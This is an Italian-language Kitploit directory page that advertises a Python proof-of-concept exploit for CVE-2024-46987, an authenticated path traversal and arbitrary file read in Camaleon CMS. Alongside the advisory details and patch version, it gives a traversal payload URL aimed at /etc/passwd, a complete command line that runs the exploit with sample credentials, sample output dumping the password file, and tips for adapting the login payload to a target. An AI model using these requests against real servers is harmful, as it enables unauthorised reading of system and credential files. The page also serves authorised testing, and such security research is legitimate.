Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-46987 — Exploit creato con Python | Kitploit
Strumenti/GitHubGitHub/advaitpathak21/cve-2024-46987
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubadvaitpathak21/cve-2024-46987

CVE-2024-46987

Exploit creato con Python

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-46987 – Camaleon CMS Path Traversal Autenticato / Lettura Arbitraria di File

CVSS 7.7 High Python PoC

CVE-2024-46987 è una vulnerabilità di path traversal autenticato (CWE-22) in Camaleon CMS (un sistema di gestione dei contenuti basato su Ruby on Rails). Consente a un utente autenticato (anche con privilegi bassi) di leggere file arbitrari sul server tramite l'azione MediaController#download_private_file.

  • Pubblicato: 18 settembre 2024
  • CVSS v3.1: 7.7 Alto
    Vettore: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-22 (Limitazione impropria di un nome di percorso a una directory ristretta), CWE-200 (Esposizione di informazioni sensibili)
  • Versioni affette: Camaleon CMS ≤ 2.8.0 (alcuni report indicano che funziona anche su 2.9.0)
  • Patch disponibile in: ≥ 2.8.2 (consigliato: aggiornare all'ultima versione 2.8.x o 2.9.x)
  • Avvisi:
    • GitHub Advisory GHSA-cp65-5m9r-vc2c
    • NVD CVE-2024-46987
Scarica lo strumento
  • GitHub Security Lab GHSL-2024-183
  • Panoramica della Vulnerabilità

    Un attaccante con credenziali valide può inviare una richiesta appositamente costruita a: /admin/media/download_private_file?file=../../../../etc/passwd

    Installazione dei Requisiti

    • pip install -r requirements.txt

    OPPURE

    • pip install -r requests fire

    Utilizzo

    • Prima crea un nuovo utente
    root@kitploit:~
    python cms-exploit.py \
      --url http://target.local \
      --username neal \
      --password 'Caffery@123' \
      --cmd /etc/passwd
    
    • Output di esempio:
    root@kitploit:~
    [+] Login riuscito
    [*] Richiesta in corso: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
    [+] Successo – contenuto:
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    .
    .
    

    Nota: Lo script presuppone un modulo di login in stile Rails (user[email], user[password], authenticity_token). Regola i campi del payload se il tuo target utilizza nomi personalizzati.

    Avvertenza Legale ed Etica

    Questo strumento è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.

    Utilizzalo solo su sistemi di tua proprietà o per i quali hai un esplicito permesso scritto di test (ad esempio, programmi bug bounty, pentest interni, laboratori come HTB). L'uso non autorizzato potrebbe violare leggi. L'autore non è responsabile per un uso improprio.